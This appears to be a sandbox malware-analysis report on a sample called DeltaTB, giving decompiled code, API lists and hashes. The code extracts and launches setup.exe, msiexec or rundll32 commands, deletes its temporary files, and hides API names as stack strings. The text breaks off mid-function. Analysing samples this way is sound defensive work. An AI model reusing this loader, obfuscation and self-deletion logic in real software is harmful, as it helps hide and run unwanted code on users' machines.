                                                                                                                                                              • Opcode ID: 19d29e3f5b189c42309ce868db82e56a1a5aeaf2e8ee473f6d6fadcdb60d298d
                                                                                                                                                              • Instruction ID: af737f9a2d93dd38fd893e85b273ed74e1d369df443418818c6923238f2b61ce
                                                                                                                                                              • Opcode Fuzzy Hash: 19d29e3f5b189c42309ce868db82e56a1a5aeaf2e8ee473f6d6fadcdb60d298d
                                                                                                                                                              • Instruction Fuzzy Hash: C4517D31604214AFD7309F65EC88BBA77BDEF97310F244459E586D21A0E7709981EFA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 56%
                                                                                                                                                              			E009A10D8(void* __ebx, void* __edi, void* __eflags) {
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				void* _t49;
                                                                                                                                                              				WCHAR* _t51;
                                                                                                                                                              				int _t57;
                                                                                                                                                              				long _t63;
                                                                                                                                                              				void* _t65;
                                                                                                                                                              				void* _t86;
                                                                                                                                                              				void* _t89;
                                                                                                                                                              				void* _t90;
                                                                                                                                                              				signed int _t91;
                                                                                                                                                              				void* _t93;
                                                                                                                                                              
                                                                                                                                                              				_t86 = __edi;
                                                                                                                                                              				_t74 = __ebx;
                                                                                                                                                              				_t91 = _t93 - 0x80c;
                                                                                                                                                              				 *(_t91 + 0x808) =  *0x9a5000 ^ _t91;
                                                                                                                                                              				 *((intOrPtr*)(_t91 - 0x28)) =  *((intOrPtr*)(_t91 + 0x814));
                                                                                                                                                              				_push(_t91 - 0x80);
                                                                                                                                                              				 *(_t91 - 0x80) = 0x44;
                                                                                                                                                              				 *((intOrPtr*)(__edi + 0x1c))();
                                                                                                                                                              				E009A3C02(_t91 + 0x5fc, __edi + 0x44);
                                                                                                                                                              				E009A221A(_t91 + 0x5fc);
                                                                                                                                                              				_t85 = __ebx;
                                                                                                                                                              				if(E009A1718(L".dll,", __ebx) == 0xffffffff) {
                                                                                                                                                              					_t85 = __ebx;
                                                                                                                                                              					_t49 = E009A1718(L".msi", __ebx);
                                                                                                                                                              					_push( *((intOrPtr*)(_t91 - 0x28)));
                                                                                                                                                              					_push(__ebx);
                                                                                                                                                              					_push(_t91 + 0x5fc);
                                                                                                                                                              					_t51 = _t91 - 0x24;
                                                                                                                                                              					if(_t49 == 0xffffffff) {
                                                                                                                                                              						_push(L"\"%s%s\" %s");
                                                                                                                                                              					} else {
                                                                                                                                                              						_push(L"msiexec /i \"%s%s\" %s");
                                                                                                                                                              					}
                                                                                                                                                              					wsprintfW(_t51, ??);
                                                                                                                                                              				} else {
                                                                                                                                                              					_t65 = E009A109D(__edi);
                                                                                                                                                              					_push(_t91 + 0x3f0);
                                                                                                                                                              					_push(0);
                                                                                                                                                              					_push(0);
                                                                                                                                                              					_push(0x25 + (0 | _t65 != 0x00000000) * 4);
                                                                                                                                                              					_push(0);
                                                                                                                                                              					 *((intOrPtr*)(__edi + 0x20))();
                                                                                                                                                              					_t90 = _t91 + 0x3f0;
                                                                                                                                                              					E009A221A(_t90);
                                                                                                                                                              					wsprintfW(_t91 - 0x24, L"\"%srundll32.exe\"  \"%s%s\" %s", _t90, _t91 + 0x5fc, __ebx,  *((intOrPtr*)(_t91 - 0x28)));
                                                                                                                                                              				}
                                                                                                                                                              				_t57 = CreateProcessW(0, _t91 - 0x24, 0, 0, 0, 0, 0, _t86 + 0x44, _t91 - 0x80, _t91 - 0x3c); // executed
                                                                                                                                                              				_pop(_t89);
                                                                                                                                                              				if(_t57 != 0) {
                                                                                                                                                              					 *((intOrPtr*)(_t86 + 0x24))( *(_t91 - 0x3c), 0xffffffff);
                                                                                                                                                              					GetExitCodeProcess( *(_t91 - 0x3c), _t91 - 0x2c);
                                                                                                                                                              					 *((intOrPtr*)(_t86 + 0x2c))( *(_t91 - 0x3c));
                                                                                                                                                              					 *((intOrPtr*)(_t86 + 0x2c))( *((intOrPtr*)(_t91 - 0x38)));
                                                                                                                                                              					_t63 =  *(_t91 - 0x2c);
                                                                                                                                                              				} else {
                                                                                                                                                              					_t63 = 0xc;
                                                                                                                                                              				}
                                                                                                                                                              				return E009A3BC5(_t63, _t74,  *(_t91 + 0x808) ^ _t91, _t85, _t86, _t89);
                                                                                                                                                              			}















                                                                                                                                                              APIs
                                                                                                                                                              • _wcscpy.LIBCMT ref: 009A1116
                                                                                                                                                                • Part of subcall function 009A221A: lstrlenW.KERNEL32(?,009A143E), ref: 009A221B
                                                                                                                                                                • Part of subcall function 009A221A: lstrcatW.KERNEL32(?,009A4238), ref: 009A222F
                                                                                                                                                              • wsprintfW.USER32 ref: 009A117F
                                                                                                                                                              • wsprintfW.USER32 ref: 009A11B6
                                                                                                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 009A11D7
                                                                                                                                                              • GetExitCodeProcess.KERNELBASE(?,?), ref: 009A11F6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.363772667.00000000009A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.363761133.00000000009A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.363783870.00000000009A6000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_9a0000_DeltaTB.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Processwsprintf$CodeCreateExit_wcscpylstrcatlstrlen
                                                                                                                                                              • String ID: "%s%s" %s$"%srundll32.exe" "%s%s" %s$.dll,$.msi$msiexec /i "%s%s" %s$setup.exe
                                                                                                                                                              • API String ID: 1002973698-2298058916
                                                                                                                                                              • Opcode ID: c834fe887962dd9a72287f4f51ae1996e3e938dd3d354d20f24b6306c5b51e77
                                                                                                                                                              • Instruction ID: a48203150a27d70abc36bd94cfb22c3c3ff3dc9d577badf3db6f626df91fff48
                                                                                                                                                              • Opcode Fuzzy Hash: c834fe887962dd9a72287f4f51ae1996e3e938dd3d354d20f24b6306c5b51e77
                                                                                                                                                              • Instruction Fuzzy Hash: 0C315F7190410AAFCB149FA4DC49EEE7BBCFF49314F108225FA16E2150EB34AA558BE0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 66 9a15a7-9a1605 call 9a1b83 call 9a1000 72 9a160b-9a161d call 9a154e 66->72 73 9a1715-9a1716 66->73 77 9a16e3-9a16f8 call 9a1889 RemoveDirectoryW 72->77 78 9a1623-9a162c 72->78 75 9a170f ExitProcess 73->75 85 9a16fe-9a170c call 9a17bc 77->85 80 9a169a-9a16b3 call 9a14dc call 9a3ca2 78->80 81 9a162e 78->81 95 9a16c8-9a16d7 call 9a121f 80->95 96 9a16b5-9a16bf call 9a12e1 80->96 84 9a1634-9a1646 call 9a3c6b 81->84 93 9a1648-9a165a call 9a3c6b 84->93 94 9a1689 84->94 85->73 99 9a170e 85->99 93->94 104 9a165c-9a166e call 9a3c6b 93->104 98 9a168d-9a1698 94->98 105 9a16dc-9a16e1 95->105 103 9a16c4-9a16c6 96->103 98->80 98->84 99->75 103->105 108 9a1670-9a1682 call 9a3c6b 104->108 109 9a1684-9a1687 104->109 105->77 105->85 108->98 108->109 109->98
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			_entry_() {
                                                                                                                                                              				void* _t36;
                                                                                                                                                              				void* _t46;
                                                                                                                                                              				int _t48;
                                                                                                                                                              				void* _t49;
                                                                                                                                                              				void* _t50;
                                                                                                                                                              				void* _t51;
                                                                                                                                                              				void* _t52;
                                                                                                                                                              				void* _t53;
                                                                                                                                                              				int _t54;
                                                                                                                                                              				void* _t56;
                                                                                                                                                              				void* _t62;
                                                                                                                                                              				int _t64;
                                                                                                                                                              				signed int _t65;
                                                                                                                                                              				void* _t66;
                                                                                                                                                              				signed int _t71;
                                                                                                                                                              				void* _t72;
                                                                                                                                                              				void* _t73;
                                                                                                                                                              				void* _t74;
                                                                                                                                                              
                                                                                                                                                              				_t71 = _t72 - 0x9c0;
                                                                                                                                                              				_t73 = _t72 - 0xa3c;
                                                                                                                                                              				 *(_t71 + 0x9bc) =  *0x9a5000 ^ _t71;
                                                                                                                                                              				_t54 = 0;
                                                                                                                                                              				_t67 = _t71 - 0x78;
                                                                                                                                                              				 *((char*)(_t71 - 0x79)) = 0;
                                                                                                                                                              				 *(_t71 - 0x7a) = 1;
                                                                                                                                                              				E009A1B83(_t71 - 0x78);
                                                                                                                                                              				 *((intOrPtr*)(_t71 + 0x1dc)) = 0;
                                                                                                                                                              				 *((intOrPtr*)(_t71 + 0x1e0)) = 0;
                                                                                                                                                              				 *((intOrPtr*)(_t71 + 0x1e4)) = 0;
                                                                                                                                                              				 *((intOrPtr*)(_t71 + 0x1e8)) = 3;
                                                                                                                                                              				 *((intOrPtr*)(_t71 + 0x1d8)) =  *((intOrPtr*)(_t71 - 0x3c))(0, _t62, _t66, _t53);
                                                                                                                                                              				_t36 = E009A1000(_t67, _t56, _t61, _t74); // executed
                                                                                                                                                              				if(_t36 != 0) {
                                                                                                                                                              					L19:
                                                                                                                                                              					ExitProcess(_t54);
                                                                                                                                                              					L18:
                                                                                                                                                              				}
                                                                                                                                                              				_t64 = E009A154E(_t67, _t71 + 0x1ec);
                                                                                                                                                              				if(_t64 != 0) {
                                                                                                                                                              					L15:
                                                                                                                                                              					E009A1889(_t54, _t71 + 0x1dc, _t61, _t71 - 0x34, 1); // executed
                                                                                                                                                              					RemoveDirectoryW(_t71 - 0x34); // executed
                                                                                                                                                              					L16:
                                                                                                                                                              					E009A17BC(_t71 + 0x1dc);
                                                                                                                                                              					if( *((intOrPtr*)(_t71 - 0x79)) == _t54) {
                                                                                                                                                              						goto L19;
                                                                                                                                                              					}
                                                                                                                                                              					ExitProcess(_t64);
                                                                                                                                                              					goto L18;
                                                                                                                                                              				}
                                                                                                                                                              				_t65 = 0;
                                                                                                                                                              				if( *((intOrPtr*)(_t71 + 0x1ec)) == 0) {
                                                                                                                                                              					L11:
                                                                                                                                                              					_t69 = E009A14DC(_t71 - 0x78, L"ExecuteFiles");
                                                                                                                                                              					_t46 = E009A3CA2(_t45);
                                                                                                                                                              					_t83 = _t46;
                                                                                                                                                              					if(_t46 == 0) {
                                                                                                                                                              						_t61 = L"setup.exe";
                                                                                                                                                              						_t48 = E009A121F(_t71 - 0x78, L"setup.exe", __eflags, _t71 + 0x1ec);
                                                                                                                                                              					} else {
                                                                                                                                                              						_t48 = E009A12E1(_t71 - 0x78, _t71 + 0x1ec, _t65, _t83, _t69); // executed
                                                                                                                                                              						_t54 = 0;
                                                                                                                                                              					}
                                                                                                                                                              					_t64 = _t48;
                                                                                                                                                              					if( *(_t71 - 0x7a) == _t54) {
                                                                                                                                                              						goto L16;
                                                                                                                                                              					} else {
                                                                                                                                                              						goto L15;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				_t70 = _t71 + 0x1ec;
                                                                                                                                                              				do {
                                                                                                                                                              					_t49 = E009A3C6B(_t70, L"/rt", 3);
                                                                                                                                                              					_t73 = _t73 + 0xc;
                                                                                                                                                              					if(_t49 == 0) {
                                                                                                                                                              						L9:
                                                                                                                                                              						 *((char*)(_t71 - 0x79)) = 1;
                                                                                                                                                              						goto L10;
                                                                                                                                                              					}
                                                                                                                                                              					_t50 = E009A3C6B(_t70, L"-rt", 3);
                                                                                                                                                              					_t73 = _t73 + 0xc;
                                                                                                                                                              					if(_t50 == 0) {
                                                                                                                                                              						goto L9;
                                                                                                                                                              					}
                                                                                                                                                              					_t51 = E009A3C6B(_t70, L"/nodel", 6);
                                                                                                                                                              					_t73 = _t73 + 0xc;
                                                                                                                                                              					if(_t51 == 0) {
                                                                                                                                                              						L8:
                                                                                                                                                              						 *(_t71 - 0x7a) = _t54;
                                                                                                                                                              						goto L10;
                                                                                                                                                              					}
                                                                                                                                                              					_t52 = E009A3C6B(_t70, L"-nodel", 6);
                                                                                                                                                              					_t73 = _t73 + 0xc;
                                                                                                                                                              					if(_t52 != 0) {
                                                                                                                                                              						goto L10;
                                                                                                                                                              					}
                                                                                                                                                              					goto L8;
                                                                                                                                                              					L10:
                                                                                                                                                              					_t65 = _t65 + 1;
                                                                                                                                                              					_t70 = _t71 + 0x1ec + _t65 * 2;
                                                                                                                                                              				} while ( *((intOrPtr*)(_t71 + 0x1ec + _t65 * 2)) != _t54);
                                                                                                                                                              				goto L11;
                                                                                                                                                              			}






















                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 009A1B83: LoadLibraryA.KERNEL32(Kernel32.dll,?,00000000), ref: 009A1B9F
                                                                                                                                                                • Part of subcall function 009A1B83: GetProcAddress.KERNEL32(00000000,?), ref: 009A1BF1
                                                                                                                                                                • Part of subcall function 009A1B83: LoadLibraryA.KERNELBASE(?,?,00000000), ref: 009A1C94
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 009A170F
                                                                                                                                                                • Part of subcall function 009A154E: _wcscpy.LIBCMT ref: 009A1581
                                                                                                                                                                • Part of subcall function 009A154E: _wcscat.LIBCMT ref: 009A158F
                                                                                                                                                                • Part of subcall function 009A154E: _wcscat.LIBCMT ref: 009A1599
                                                                                                                                                              • _wcslen.LIBCMT ref: 009A16AB
                                                                                                                                                              • RemoveDirectoryW.KERNELBASE(?,?,00000001,?), ref: 009A16F8
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.363772667.00000000009A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.363761133.00000000009A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.363783870.00000000009A6000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_9a0000_DeltaTB.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LibraryLoad_wcscat$AddressDirectoryExitProcProcessRemove_wcscpy_wcslen
                                                                                                                                                              • String ID: -nodel$-rt$/nodel$/rt$ExecuteFiles$setup.exe
                                                                                                                                                              • API String ID: 1851553072-3790594100
                                                                                                                                                              • Opcode ID: 0e962699882675b6dad9d2b12f130caa886325048dbc2260b68a637fb2d0ab49
                                                                                                                                                              • Instruction ID: 2234aef7290e0584f7b1b12ad3c9c02ffa15895abeb1ce012510cd0a3f6fe777
                                                                                                                                                              • Opcode Fuzzy Hash: 0e962699882675b6dad9d2b12f130caa886325048dbc2260b68a637fb2d0ab49
                                                                                                                                                              • Instruction Fuzzy Hash: A7419E71A442889ADB30EFA4DC81BDD76ADAFA3304F154029FD05E7182EB705B49CBD5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 112 9a1889-9a18a7 113 9a18a9 112->113 114 9a18ac-9a18c0 GetCurrentDirectoryW 112->114 113->114 115 9a18cd-9a18d6 SetCurrentDirectoryW 114->115 116 9a18c2-9a18c8 GetLastError 114->116 115->116 118 9a18d8 115->118 117 9a1975-9a1982 call 9a3bc5 116->117 120 9a18d9-9a18de 118->120 122 9a1959-9a1968 SetCurrentDirectoryW 120->122 123 9a18e0-9a18f6 120->123 124 9a196a-9a1970 GetLastError 122->124 125 9a1972 122->125 123->122 126 9a18f8-9a18fa 123->126 129 9a1974 124->129 125->129 127 9a18fc-9a1900 126->127 128 9a1907-9a1928 call 9a17dd call 9a3ca2 call 9a17dd 126->128 127->128 130 9a1902-9a1905 127->130 137 9a192a-9a1936 call 9a1889 128->137 138 9a1941-9a194a DeleteFileW 128->138 129->117 130->128 137->129 143 9a1938-9a193f RemoveDirectoryW 137->143 138->120 140 9a194c-9a1955 GetLastError 138->140 140->120 142 9a1957 140->142 142->129 143->120
                                                                                                                                                              C-Code - Quality: 89%
                                                                                                                                                              			E009A1889(void* __ebx, signed int* __ecx, intOrPtr __edx, WCHAR* _a4, char _a8) {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				short _v532;
                                                                                                                                                              				void* __edi;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				int _t19;
                                                                                                                                                              				intOrPtr _t22;
                                                                                                                                                              				int _t24;
                                                                                                                                                              				intOrPtr _t25;
                                                                                                                                                              				intOrPtr _t26;
                                                                                                                                                              				int _t31;
                                                                                                                                                              				void* _t34;
                                                                                                                                                              				intOrPtr _t35;
                                                                                                                                                              				intOrPtr _t39;
                                                                                                                                                              				intOrPtr _t42;
                                                                                                                                                              				WCHAR* _t43;
                                                                                                                                                              				intOrPtr* _t45;
                                                                                                                                                              				signed int _t46;
                                                                                                                                                              
                                                                                                                                                              				_t42 = __edx;
                                                                                                                                                              				_t34 = __ebx;
                                                                                                                                                              				_v8 =  *0x9a5000 ^ _t46;
                                                                                                                                                              				_t43 = _a4;
                                                                                                                                                              				_t45 = __ecx;
                                                                                                                                                              				if(_a8 != 0) {
                                                                                                                                                              					 *__ecx =  *__ecx & 0x00000000;
                                                                                                                                                              				}
                                                                                                                                                              				if(GetCurrentDirectoryW(0x104,  &_v532) != 0) {
                                                                                                                                                              					_t19 = SetCurrentDirectoryW(_t43); // executed
                                                                                                                                                              					if(_t19 == 0) {
                                                                                                                                                              						goto L3;
                                                                                                                                                              					}
                                                                                                                                                              					_push(_t34);
                                                                                                                                                              					while(1) {
                                                                                                                                                              						_t22 =  *_t45;
                                                                                                                                                              						if(_t22 >=  *((intOrPtr*)(_t45 + 4))) {
                                                                                                                                                              							break;
                                                                                                                                                              						}
                                                                                                                                                              						_t39 =  *((intOrPtr*)(_t45 + 8));
                                                                                                                                                              						_t42 =  *((intOrPtr*)(_t39 + _t22));
                                                                                                                                                              						_t25 = _t22 + 4;
                                                                                                                                                              						 *_t45 = _t25;
                                                                                                                                                              						_t35 =  *((intOrPtr*)(_t25 + _t39));
                                                                                                                                                              						_t26 = _t25 + 4;
                                                                                                                                                              						 *_t45 = _t26;
                                                                                                                                                              						if(_t35 == 2) {
                                                                                                                                                              							break;
                                                                                                                                                              						}
                                                                                                                                                              						if(_t35 == 0 &&  *((intOrPtr*)(_t45 + 0xc)) > 1) {
                                                                                                                                                              							 *_t45 = _t26 + 8;
                                                                                                                                                              						}
                                                                                                                                                              						 *_t45 =  *_t45 + _t42;
                                                                                                                                                              						E009A17DD(_t45);
                                                                                                                                                              						_t43 =  *_t45 +  *((intOrPtr*)(_t45 + 8));
                                                                                                                                                              						 *_t45 =  *_t45 + E009A3CA2(_t43) + _t28 + 2;
                                                                                                                                                              						E009A17DD(_t45);
                                                                                                                                                              						if(_t35 != 1) {
                                                                                                                                                              							_t31 = DeleteFileW(_t43); // executed
                                                                                                                                                              							if(_t31 != 0 || GetLastError() == 2) {
                                                                                                                                                              								continue;
                                                                                                                                                              							} else {
                                                                                                                                                              								goto L20;
                                                                                                                                                              							}
                                                                                                                                                              						} else {
                                                                                                                                                              							_t20 = E009A1889(_t35, _t45, _t42, _t43, 0); // executed
                                                                                                                                                              							if(_t20 != 0) {
                                                                                                                                                              								L20:
                                                                                                                                                              								_pop(_t34);
                                                                                                                                                              								goto L21;
                                                                                                                                                              							}
                                                                                                                                                              							RemoveDirectoryW(_t43); // executed
                                                                                                                                                              							continue;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					_t24 = SetCurrentDirectoryW( &_v532); // executed
                                                                                                                                                              					if(_t24 != 0) {
                                                                                                                                                              						_t20 = 0;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t20 = GetLastError();
                                                                                                                                                              					}
                                                                                                                                                              					goto L20;
                                                                                                                                                              				} else {
                                                                                                                                                              					L3:
                                                                                                                                                              					_t20 = GetLastError();
                                                                                                                                                              					L21:
                                                                                                                                                              					return E009A3BC5(_t20, _t34, _v8 ^ _t46, _t42, _t43, _t45);
                                                                                                                                                              				}
                                                                                                                                                              			}





















                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,?), ref: 009A18B8
                                                                                                                                                              • GetLastError.KERNEL32 ref: 009A18C2
                                                                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?), ref: 009A18CE
                                                                                                                                                              • _wcslen.LIBCMT ref: 009A1914
                                                                                                                                                              • RemoveDirectoryW.KERNELBASE(?,00000000), ref: 009A1939
                                                                                                                                                              • DeleteFileW.KERNELBASE(?,00000000), ref: 009A1942
                                                                                                                                                              • GetLastError.KERNEL32 ref: 009A194C
                                                                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,00000000), ref: 009A1960
                                                                                                                                                              • GetLastError.KERNEL32 ref: 009A196A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.363772667.00000000009A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.363761133.00000000009A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.363783870.00000000009A6000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_9a0000_DeltaTB.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Directory$CurrentErrorLast$DeleteFileRemove_wcslen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2019885757-0
                                                                                                                                                              • Opcode ID: b0eefbe41aaa845283a9901e49bca71c2debc5799c7279e4f9346e725fed4dc3
                                                                                                                                                              • Instruction ID: d2edb2b241b1bbc77b342043e9b3d89c3e959a371e589443b679a9d9b49c67b1
                                                                                                                                                              • Opcode Fuzzy Hash: b0eefbe41aaa845283a9901e49bca71c2debc5799c7279e4f9346e725fed4dc3
                                                                                                                                                              • Instruction Fuzzy Hash: 4E31AC306002159BD734EF2AE888B6AB3EDEF97310F20482DE582D2150E778A840EBD0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              control_flow_graph 165 9a1b83-9a1bab LoadLibraryA 166 9a1bb1-9a1f4d GetProcAddress LoadLibraryA * 2 165->166 167 9a2207-9a2219 call 9a3bc5 165->167 178 9a1f51-9a2204 166->178 178->167
                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                              			E009A1B83(intOrPtr* __esi) {
                                                                                                                                                              				void* __ebx;
                                                                                                                                                              				void* __edi;
                                                                                                                                                              				_Unknown_base(*)()* _t356;
                                                                                                                                                              				struct HINSTANCE__* _t358;
                                                                                                                                                              				void* _t361;
                                                                                                                                                              				struct HINSTANCE__* _t372;
                                                                                                                                                              				void* _t392;
                                                                                                                                                              				void* _t400;
                                                                                                                                                              				struct HINSTANCE__* _t402;
                                                                                                                                                              				void* _t403;
                                                                                                                                                              				intOrPtr* _t404;
                                                                                                                                                              				signed int _t405;
                                                                                                                                                              				void* _t407;
                                                                                                                                                              
                                                                                                                                                              				_t404 = __esi;
                                                                                                                                                              				_t405 = _t407 - 0x78;
                                                                                                                                                              				 *(_t405 + 0x74) =  *0x9a5000 ^ _t405;
                                                                                                                                                              				_t402 = LoadLibraryA("Kernel32.dll");
                                                                                                                                                              				if(_t402 != 0) {
                                                                                                                                                              					 *(_t405 - 0x24) = 0x47;
                                                                                                                                                              					 *((char*)(_t405 - 0x23)) = 0x65;
                                                                                                                                                              					 *((char*)(_t405 - 0x22)) = 0x74;
                                                                                                                                                              					 *((char*)(_t405 - 0x21)) = 0x50;
                                                                                                                                                              					 *((char*)(_t405 - 0x20)) = 0x72;
                                                                                                                                                              					 *((char*)(_t405 - 0x1f)) = 0x6f;
                                                                                                                                                              					 *((char*)(_t405 - 0x1e)) = 0x63;
                                                                                                                                                              					 *((char*)(_t405 - 0x1d)) = 0x41;
                                                                                                                                                              					 *((char*)(_t405 - 0x1c)) = 0x64;
                                                                                                                                                              					 *((char*)(_t405 - 0x1b)) = 0x64;
                                                                                                                                                              					 *((char*)(_t405 - 0x1a)) = 0x72;
                                                                                                                                                              					 *((char*)(_t405 - 0x19)) = 0x65;
                                                                                                                                                              					 *((char*)(_t405 - 0x18)) = 0x73;
                                                                                                                                                              					 *((char*)(_t405 - 0x17)) = 0x73;
                                                                                                                                                              					 *((char*)(_t405 - 0x16)) = 0;
                                                                                                                                                              					// The bytes written at _t405 - 0x24 spell the stack string "GetProcAddress".
                                                                                                                                                              					_t356 = GetProcAddress(_t402, _t405 - 0x24);
                                                                                                                                                              					 *(__esi + 4) = _t356;
                                                                                                                                                              					 *((char*)(_t405 + 0xc)) = 0x4c;
                                                                                                                                                              					 *((char*)(_t405 + 0xd)) = 0x6f;
                                                                                                                                                              					 *((char*)(_t405 + 0xe)) = 0x61;
                                                                                                                                                              					 *((char*)(_t405 + 0xf)) = 0x64;
                                                                                                                                                              					 *((char*)(_t405 + 0x10)) = 0x4c;
                                                                                                                                                              					 *((char*)(_t405 + 0x11)) = 0x69;
                                                                                                                                                              					 *((char*)(_t405 + 0x12)) = 0x62;
                                                                                                                                                              					 *((char*)(_t405 + 0x13)) = 0x72;
                                                                                                                                                              					 *((char*)(_t405 + 0x14)) = 0x61;
                                                                                                                                                              					 *((char*)(_t405 + 0x15)) = 0x72;
                                                                                                                                                              					 *((char*)(_t405 + 0x16)) = 0x79;
                                                                                                                                                              					 *((char*)(_t405 + 0x17)) = 0x41;
                                                                                                                                                              					 *((char*)(_t405 + 0x18)) = 0;
                                                                                                                                                              					// The bytes written at _t405 + 0xc spell "LoadLibraryA"; its address is stored at *__esi.
                                                                                                                                                              					 *__esi =  *_t356(_t402, _t405 + 0xc);
                                                                                                                                                              					 *(_t405 + 0x68) = 0x4f;
                                                                                                                                                              					 *((char*)(_t405 + 0x69)) = 0x4c;
                                                                                                                                                              					 *((char*)(_t405 + 0x6a)) = 0x45;
                                                                                                                                                              					 *((char*)(_t405 + 0x6b)) = 0x33;
                                                                                                                                                              					 *((char*)(_t405 + 0x6c)) = 0x32;
                                                                                                                                                              					 *((char*)(_t405 + 0x6d)) = 0x2e;
                                                                                                                                                              					 *((char*)(_t405 + 0x6e)) = 0x44;
                                                                                                                                                              					 *((char*)(_t405 + 0x6f)) = 0x4c;
                                                                                                                                                              					 *((char*)(_t405 + 0x70)) = 0x4c;
                                                                                                                                                              					 *((char*)(_t405 + 0x71)) = 0;
                                                                                                                                                              					 *((char*)(_t405 - 4)) = 0x43;
                                                                                                                                                              					 *((char*)(_t405 - 3)) = 0x6f;
                                                                                                                                                              					 *((char*)(_t405 - 2)) = 0x43;
                                                                                                                                                              					 *((char*)(_t405 - 1)) = 0x72;
                                                                                                                                                              					 *_t405 = 0x65;
                                                                                                                                                              					 *((char*)(_t405 + 1)) = 0x61;
                                                                                                                                                              					 *((char*)(_t405 + 2)) = 0x74;
                                                                                                                                                              					 *((char*)(_t405 + 3)) = 0x65;
                                                                                                                                                              					 *((char*)(_t405 + 4)) = 0x47;
                                                                                                                                                              					 *((char*)(_t405 + 5)) = 0x75;
                                                                                                                                                              					 *((char*)(_t405 + 6)) = 0x69;
                                                                                                                                                              					 *((char*)(_t405 + 7)) = 0x64;
                                                                                                                                                              					 *((char*)(_t405 + 8)) = 0;
                                                                                                                                                              					// The bytes written at _t405 + 0x68 spell "OLE32.DLL".
                                                                                                                                                              					_t358 = LoadLibraryA(_t405 + 0x68); // executed
                                                                                                                                                              					_push(_t405 - 4);
                                                                                                                                                              					_push(_t358);
                                                                                                                                                              					// __esi + 4 holds the GetProcAddress pointer; the pushed name at _t405 - 4 spells "CoCreateGuid".
                                                                                                                                                              					 *((intOrPtr*)(__esi + 8)) =  *(__esi + 4)();
                                                                                                                                                              					 *((char*)(_t405 + 0x50)) = 0x55;
                                                                                                                                                              					 *((char*)(_t405 + 0x51)) = 0x73;
                                                                                                                                                              					 *((char*)(_t405 + 0x52)) = 0x65;
                                                                                                                                                              					 *((char*)(_t405 + 0x53)) = 0x72;
                                                                                                                                                              					 *((char*)(_t405 + 0x54)) = 0x33;
                                                                                                                                                              					 *((char*)(_t405 + 0x55)) = 0x32;
                                                                                                                                                              					 *((char*)(_t405 + 0x56)) = 0x2e;
                                                                                                                                                              					 *((char*)(_t405 + 0x57)) = 0x64;
                                                                                                                                                              					 *((char*)(_t405 + 0x58)) = 0x6c;
                                                                                                                                                              					 *((char*)(_t405 + 0x59)) = 0x6c;
                                                                                                                                                              					 *((char*)(_t405 + 0x5a)) = 0;
                                                                                                                                                              					 *((char*)(_t405 + 0x38)) = 0x4d;
                                                                                                                                                              					_push(_t405 + 0x50);
                                                                                                                                                              					 *((char*)(_t405 + 0x39)) = 0x65;
                                                                                                                                                              					 *((char*)(_t405 + 0x3a)) = 0x73;
                                                                                                                                                              					 *((char*)(_t405 + 0x3b)) = 0x73;
                                                                                                                                                              					 *((char*)(_t405 + 0x3c)) = 0x61;
